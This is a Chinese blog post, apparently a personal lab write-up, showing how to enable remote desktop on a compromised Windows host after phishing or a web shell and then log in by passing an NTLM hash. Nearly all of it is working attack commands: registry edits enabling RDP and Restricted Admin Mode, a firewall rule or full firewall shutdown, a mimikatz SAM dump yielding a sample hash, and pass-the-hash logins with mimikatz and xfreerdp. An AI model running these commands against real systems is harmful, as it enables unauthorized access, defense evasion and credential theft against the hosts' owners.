单独记录内网渗透时如何使用命令行允许远程访问+开启3389端口,并进行哈希传递进行远程桌面连接

单独记录内网渗透时如何使用命令行允许远程访问+开启3389端口,并进行哈希传递进行远程桌面连接

前言

在通过社工钓鱼或者通过web端getshell后想对服务器进行远程桌面连接,但是发现服务器的口令较为复杂,所以思考
通过哈希传递的方法进行RDP远程桌面访问

绕过踩坑

受害机使用win10虚拟机进行实验(win7不行)
ed2k://|file|cn_windows_10_multiple_editions_x64_dvd_6848463.iso|4303300608|94FD861E82458005A9CA8E617379856A|/
攻击机使用win2016server虚拟机进行实验
ed2k://|file|cn_windows_server_2016_vl_x64_dvd_11636695.iso|6302720000|44742A3D464B9765203E2A4DB73FF704|/
下载最新的mimikatz版本 https://github.com/gentilkiwi/mimikatz/releases

实验开始

1.受害机执行允许远程访问的命令

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


2.受害机开启3389端口

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
net stop TermService
net start TermService

以下二选一
1)防火墙开启3389端口(首选)

netsh advfirewall firewall add rule name="Allow Remote Desktop" dir=in action=allow protocol=TCP localport=3389

2)直接关掉防火墙

netsh advfirewall set allprofiles state off

3.查看3389是否开启

netstat -ano | findstr 3389


到现在了应该可以进行RDP远程连接了

4.开启受害机的Restricted Admin Mode

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f


5.受害机中使用mimikatz

mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit


获取到ntml hash
c20a43b71503528c05c57fcbff0c78e3
6.攻击机中使用mimikatz

mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:. /ntlm:c20a43b71503528c05c57fcbff0c78e3 "/run:mstsc.exe /restrictedadmin"

踩坑1:

解决:下载最新的mimikatz版本 https://github.com/gentilkiwi/mimikatz/releases
踩坑2:

解决:不用win10家庭版作为攻击机
win2016server ed2k://|file|cn_windows_server_2016_vl_x64_dvd_11636695.iso|6302720000|44742A3D464B9765203E2A4DB73FF704|/
踩坑3:

解决:不用win7作为攻击机
win2016server ed2k://|file|cn_windows_server_2016_vl_x64_dvd_11636695.iso|6302720000|44742A3D464B9765203E2A4DB73FF704|/
踩坑4:

解决:攻击机要用管理员权限运行
最终成功是这样的

然后输入受害机ip


如果有变黑的话需要稍微等一伙儿

后言

后来发现在linux中使用freefdp也可以哈希传递rdp登录

xfreerdp /v:ip /u:administrator /pth:xxx /sound /tls-seclevel:0 /timeout:80000
posted @ 2023-09-21 15:44  BattleofZhongDinghe  阅读(782)  评论(0编辑  收藏  举报